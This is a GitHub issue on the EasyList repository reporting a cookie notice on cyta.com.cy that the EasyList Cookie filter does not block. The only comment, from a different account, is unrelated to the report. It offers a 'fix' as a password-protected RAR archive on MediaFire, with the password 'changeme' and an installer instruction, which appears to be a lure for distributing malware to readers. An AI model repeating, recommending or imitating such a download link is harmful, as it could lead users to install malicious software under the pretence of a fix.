### ISSUE TITLE
cyta.com.cy: Cookie notice

### ISSUE THREAD

**Issue by MEtICaRT** [easylist/easylist#19884]
#### List the website(s) you're having issues with:

https://www.cyta.com.cy/

#### What happens?

There is a cookie notice.

#### Screenshot(s) 

<img width="1980" alt="image" src="https://github.com/user-attachments/assets/39ff8c80-ec39-43a4-a04b-fe777ac983d2">

#### Filter lists you're using:

EasyList Cookie

#### Your settings:

- OS/version: 
- Browser/version: 
- Ad block extension/version:

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
